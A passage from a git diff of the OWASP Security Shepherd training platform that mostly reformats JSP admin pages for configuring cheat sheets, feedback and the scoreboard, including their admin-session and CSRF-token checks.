-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtml(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <h1 class="title">The OWASP Security Shepherd Project</h1>
 <p>
-    You are currently using Security Shepherd Version 3.2 <br>
-    <br> The OWASP Security Shepherd project is a web and mobile
-    application security training platform. Security Shepherd has been
-    designed to foster and improve security awareness among a varied
-    skill-set demographic. The aim of this project is to take AppSec
-    novices or experienced engineers and sharpen their penetration testing
-    skill set to security expert status. For More information, please visit
-    the <a href="http://bit.ly/owaspSecurityShepherd">OWASP Security
-    Shepherd Wiki Page</a>. <br>
-    <br> Please report any bugs or any feature requests on the <a
-        href="http://bit.ly/securityShepherdGithub">OWASP Security
-    Shepherd Git Repository</a>.
+	You are currently using Security Shepherd Version 3.2 <br>
+	<br> The OWASP Security Shepherd project is a web and mobile
+	application security training platform. Security Shepherd has been
+	designed to foster and improve security awareness among a varied
+	skill-set demographic. The aim of this project is to take AppSec
+	novices or experienced engineers and sharpen their penetration testing
+	skill set to security expert status. For More information, please visit
+	the <a href="http://bit.ly/owaspSecurityShepherd">OWASP Security
+		Shepherd Wiki Page</a>. <br>
+	<br> Please report any bugs or any feature requests on the <a
+		href="http://bit.ly/securityShepherdGithub">OWASP Security
+		Shepherd Git Repository</a>.
 </p>
 <%= Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession()))) %>
-<br/>
-<br/>
+<br />
+<br />
 <div id="badData" style="display: none;"></div>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/admin/config/configCheats.jsp b/src/main/webapp/admin/config/configCheats.jsp
index c4ea06324..dbb1d8a27 100644
--- a/src/main/webapp/admin/config/configCheats.jsp
+++ b/src/main/webapp/admin/config/configCheats.jsp
@@ -1,185 +1,203 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configCheats.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configCheats.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configCheats.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configCheats.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	// Getting Session Variables
+	//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	
+	String csrfToken = Encode.forHtml(tokenCookie.getValue());
+	String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <h1 class="title">Configure Cheat Sheets</h1>
 <p>The Security Shepherd Application is capable of presenting users
-    with &quot;Cheat Sheets&quot; that will instruct the reader on how to
-    complete a specific module. These cheats are disabled by default, but
-    can be enabled for administrators or all players. Once enabled, as you
-    open Security Shepherd modules, a cheat button will appear in the left
-    hand menu. Click this button to reveal the cheat sheet for the
-    currently open module.</p>
+	with &quot;Cheat Sheets&quot; that will instruct the reader on how to
+	complete a specific module. These cheats are disabled by default, but
+	can be enabled for administrators or all players. Once enabled, as you
+	open Security Shepherd modules, a cheat button will appear in the left
+	hand menu. Click this button to reveal the cheat sheet for the
+	currently open module.</p>
 
 <!-- Enable Cheats Section -->
-<div id="enableCheats" <% if (CheatSheetStatus.isEnabledAtAll()) {%>
-     style="display: none;" <% } %>>
-    <h2 class="title">Enable Cheat Sheets</h2>
-    <p>Enable cheat sheets for administrators or all users.</p>
-    <a href="javascript:;" style="text-decoration: none;"
-       id="enableCheatsAdmin" title="Enable Cheats for Administrators">
-        <div class="menuButton">Enable Cheat Sheets for Administrators</div>
-    </a> <a href="javascript:;" style="text-decoration: none;"
-            id="enableCheatsAll" title="Enable Cheats for All Users">
-    <div class="menuButton">Enable Cheat Sheets for All Users</div>
-</a> <br>
+<div id="enableCheats" <% if(CheatSheetStatus.isEnabledAtAll()) {%>
+	style="display: none;" <% } %>>
+	<h2 class="title">Enable Cheat Sheets</h2>
+	<p>Enable cheat sheets for administrators or all users.</p>
+	<a href="javascript:;" style="text-decoration: none;"
+		id="enableCheatsAdmin" title="Enable Cheats for Administrators">
+		<div class="menuButton">Enable Cheat Sheets for Administrators</div>
+	</a> <a href="javascript:;" style="text-decoration: none;"
+		id="enableCheatsAll" title="Enable Cheats for All Users">
+		<div class="menuButton">Enable Cheat Sheets for All Users</div>
+	</a> <br>
 </div>
 
 <!-- Disable Cheats Section -->
-<div id="disableCheats" <% if (!CheatSheetStatus.isEnabledAtAll()) {%>
-     style="display: none;" <% } %>>
-    <h2 class="title">Disable Cheat Sheets</h2>
-    <p>Are you sure that you want to disable cheat sheets for all
-        users?</p>
-    <a href="javascript:;" style="text-decoration: none;"
-       id="disableCheats" title="Disable Cheats">
-        <div class="menuButton">Disable Cheat Sheets</div>
-    </a> <br>
+<div id="disableCheats" <% if(!CheatSheetStatus.isEnabledAtAll()) {%>
+	style="display: none;" <% } %>>
+	<h2 class="title">Disable Cheat Sheets</h2>
+	<p>Are you sure that you want to disable cheat sheets for all
+		users?</p>
+	<a href="javascript:;" style="text-decoration: none;"
+		id="disableCheats" title="Disable Cheats">
+		<div class="menuButton">Disable Cheat Sheets</div>
+	</a> <br>
 </div>
 <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
 <div id="resultDiv" class="informationBox" style="display: none;"></div>
 <div id="badData" style="display: none;"></div>
 <script>
-    var theCsrfToken = "<%= csrfToken %>";
-
-    $("#enableCheatsAdmin").click(function () {
-        $("#loadingDiv").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        $("#enableCheats").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "enableCheats",
-                data: {
-                    enableForAll: "nope",
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                //Show Disable Dialog
-                $("#disableCheats").slideDown("slow");
-            });
-        });
-    });
-
-    $("#enableCheatsAll").click(function () {
-        $("#loadingDiv").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        $("#enableCheats").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "enableCheats",
-                data: {
-                    enableForAll: "true",
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                //Show Disable Dialog
-                $("#disableCheats").slideDown("slow");
-            });
-        });
-    });
-
-    $("#disableCheats").click(function () {
-        $("#loadingDiv").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        $("#disableCheats").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "disableCheats",
-                data: {
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                //Show Enable Dialog
-                $("#enableCheats").slideDown("slow");
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	var theCsrfToken = "<%= csrfToken %>";
+	
+	$("#enableCheatsAdmin").click(function(){
+		$("#loadingDiv").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		//The Ajax Operation
+		$("#enableCheats").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "enableCheats",
+				data: {
+					enableForAll: "nope",
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				//Show Disable Dialog
+				$("#disableCheats").slideDown("slow");
+			});
+		});
+	});
+	
+	$("#enableCheatsAll").click(function(){
+		$("#loadingDiv").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		//The Ajax Operation
+		$("#enableCheats").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "enableCheats",
+				data: {
+					enableForAll: "true",
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				//Show Disable Dialog
+				$("#disableCheats").slideDown("slow");
+			});
+		});
+	});
+	
+	$("#disableCheats").click(function(){
+		$("#loadingDiv").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		//The Ajax Operation
+		$("#disableCheats").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "disableCheats",
+				data: {
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				//Show Enable Dialog
+				$("#enableCheats").slideDown("slow");
+			});
+		});
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/config/configFeedback.jsp b/src/main/webapp/admin/config/configFeedback.jsp
index ed4072f38..a4bfe009a 100644
--- a/src/main/webapp/admin/config/configFeedback.jsp
+++ b/src/main/webapp/admin/config/configFeedback.jsp
@@ -1,155 +1,170 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configFeedback.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configFeedback.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configFeedback.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configFeedback.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateAdminSession ensures a valid session, and valid administrator credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
 // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	// Getting Session Variables
+	//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	
+	String csrfToken = Encode.forHtml(tokenCookie.getValue());
+	String ApplicationRoot = getServletContext().getRealPath("");
 %>
 <h1 class="title">Configure Feedback</h1>
 <p>
-    You can configure Shepherd to force users to submit a feedback form
-    before the module is marked as complete. This is used both to
-    facilitate project improvements based on feedback submitted and for
-    system administrators to collect "Reports of Understanding" from their
-    students. If you would like to submit the collected feedback to the
-    Security Shepherd Project Development Team, please follow the steps <a
-        href="https://github.com/markdenihan/owaspSecurityShepherd/wiki/How-to-Submit-Shepherd-DB-Stored-User-Feedback">found
-    here</a>.
+	You can configure Shepherd to force users to submit a feedback form
+	before the module is marked as complete. This is used both to
+	facilitate project improvements based on feedback submitted and for
+	system administrators to collect "Reports of Understanding" from their
+	students. If you would like to submit the collected feedback to the
+	Security Shepherd Project Development Team, please follow the steps <a
+		href="https://github.com/markdenihan/owaspSecurityShepherd/wiki/How-to-Submit-Shepherd-DB-Stored-User-Feedback">found
+		here</a>.
 </p>
 
 <!-- Enable Feedback Section -->
-<div id="enableFeedback" <% if (FeedbackStatus.isEnabled()) {%>
-     style="display: none;" <% } %>>
-    <h2 class="title">Enable Feedback</h2>
-    <p>Enable feedback to force users to submit feedback on each module
-        before they can complete them</p>
-    <a href="javascript:;" style="text-decoration: none;"
-       id="enableFeedback" title="Enable Feedback">
-        <div class="menuButton">Enable Feedback</div>
-    </a> <br>
+<div id="enableFeedback" <% if(FeedbackStatus.isEnabled()) {%>
+	style="display: none;" <% } %>>
+	<h2 class="title">Enable Feedback</h2>
+	<p>Enable feedback to force users to submit feedback on each module
+		before they can complete them</p>
+	<a href="javascript:;" style="text-decoration: none;"
+		id="enableFeedback" title="Enable Feedback">
+		<div class="menuButton">Enable Feedback</div>
+	</a> <br>
 </div>
 
 <!-- Disable feedback Section -->
-<div id="disableFeedback" <% if (FeedbackStatus.isDisabled()) {%>
-     style="display: none;" <% } %>>
-    <h2 class="title">Disable Feedback</h2>
-    <p>Disable feedback to allow users to complete modules without
-        having to submit a feedback form</p>
-    <a href="javascript:;" style="text-decoration: none;"
-       id="disableFeedback" title="Disable Feedback">
-        <div class="menuButton">Disable Feedback</div>
-    </a> <br>
+<div id="disableFeedback" <% if(FeedbackStatus.isDisabled()) {%>
+	style="display: none;" <% } %>>
+	<h2 class="title">Disable Feedback</h2>
+	<p>Disable feedback to allow users to complete modules without
+		having to submit a feedback form</p>
+	<a href="javascript:;" style="text-decoration: none;"
+		id="disableFeedback" title="Disable Feedback">
+		<div class="menuButton">Disable Feedback</div>
+	</a> <br>
 </div>
 <div id="loadingDiv" style="display: none;" class="menuButton">Loading...</div>
 <div id="resultDiv" class="informationBox" style="display: none;"></div>
 <div id="badData" style="display: none;"></div>
 <script>
-    var theCsrfToken = "<%= csrfToken %>";
-    $("#enableFeedback").click(function () {
-        $("#loadingDiv").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        $("#enableFeedback").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "enableFeedback",
-                data: {
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                //Show Disable Dialog
-                $("#disableFeedback").slideDown("slow");
-            });
-        });
-    });
-
-    $("#disableFeedback").click(function () {
-        $("#loadingDiv").show("fast");
-        $("#badData").hide("fast");
-        $("#resultDiv").hide("fast");
-        //The Ajax Operation
-        $("#disableFeedback").slideUp("fast", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "disableFeedback",
-                data: {
-                    csrfToken: theCsrfToken
-                },
-                async: false
-            });
-            $("#loadingDiv").hide("fast", function () {
-                if (ajaxCall.status == 200) {
-                    $("#resultDiv").html(ajaxCall.responseText);
-                    $("#resultDiv").show("fast");
-                } else {
-                    $("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
-                    $("#badData").show("slow");
-                }
-                //Show Enable Dialog
-                $("#enableFeedback").slideDown("slow");
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	var theCsrfToken = "<%= csrfToken %>";
+	$("#enableFeedback").click(function(){
+		$("#loadingDiv").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		//The Ajax Operation
+		$("#enableFeedback").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "enableFeedback",
+				data: {
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				//Show Disable Dialog
+				$("#disableFeedback").slideDown("slow");
+			});
+		});
+	});
+	
+	$("#disableFeedback").click(function(){
+		$("#loadingDiv").show("fast");
+		$("#badData").hide("fast");
+		$("#resultDiv").hide("fast");
+		//The Ajax Operation
+		$("#disableFeedback").slideUp("fast", function(){
+			var ajaxCall = $.ajax({
+				type: "POST",
+				url: "disableFeedback",
+				data: {
+					csrfToken: theCsrfToken
+				},
+				async: false
+			});
+			$("#loadingDiv").hide("fast", function(){
+				if(ajaxCall.status == 200)
+				{
+					$("#resultDiv").html(ajaxCall.responseText);
+					$("#resultDiv").show("fast");
+				}
+				else
+				{
+					$("#badData").html("<div id='errorAlert'><p> Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "</p></div>");
+					$("#badData").show("slow");
+				}
+				//Show Enable Dialog
+				$("#enableFeedback").slideDown("slow");
+			});
+		});
+	});
+	</script>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
 <% } %>
 <%
-        } else {
-            response.sendRedirect("../../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../../loggedOutSheep.html");
-    }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/admin/config/scoreboard.jsp b/src/main/webapp/admin/config/scoreboard.jsp
index d30788f00..9b059e494 100644
--- a/src/main/webapp/admin/config/scoreboard.jsp
+++ b/src/main/webapp/admin/config/scoreboard.jsp
@@ -1,491 +1,476 @@
 <%@ page contentType="text/html; charset=iso-8859-1" language="java"
-         import="servlets.Register,java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
+	import="servlets.Register,java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            "DEBUG: scoreboard Config.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			"DEBUG: scoreboard Config.jsp *************************");
 
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 * 
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 * 
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 * 
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+	 * 
+	 * @author Mark Denihan
+	 */
 
-    if (request.getSession() != null) //Session If
-    {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    "DEBUG(scoreboardConfig.jsp): tokenCookie Error:" + htmlE.toString());
-        }
-        // validateAdminSession ensures a valid session, and valid administrator credentials
-        // Also, if tokenCookie != null, then the page is good to continue loading
-        // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
-        Object tokenParmeter = request.getParameter("csrfToken");
-        if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+	if (request.getSession() != null) //Session If
+	{
+		HttpSession ses = request.getSession();
+		Getter get = new Getter();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try {
+			tokenCookie = Validate.getToken(request.getCookies());
+		} catch (Exception htmlE) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					"DEBUG(scoreboardConfig.jsp): tokenCookie Error:" + htmlE.toString());
+		}
+		// validateAdminSession ensures a valid session, and valid administrator credentials
+		// Also, if tokenCookie != null, then the page is good to continue loading
+		// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
+		Object tokenParmeter = request.getParameter("csrfToken");
+		if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+			//Logging Username
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					"Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+			// Getting Session Variables
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String ApplicationRoot = getServletContext().getRealPath("");
-            ResultSet classList = Getter.getClassInfo(ApplicationRoot);
-            boolean showClasses = true;
-            try {
-                showClasses = classList.next();
-            } catch (SQLException e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                        "Could not open classList: " + e.toString(), ses.getAttribute("userName"));
-                showClasses = false;
-            }
+			String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+			String ApplicationRoot = getServletContext().getRealPath("");
+			ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+			boolean showClasses = true;
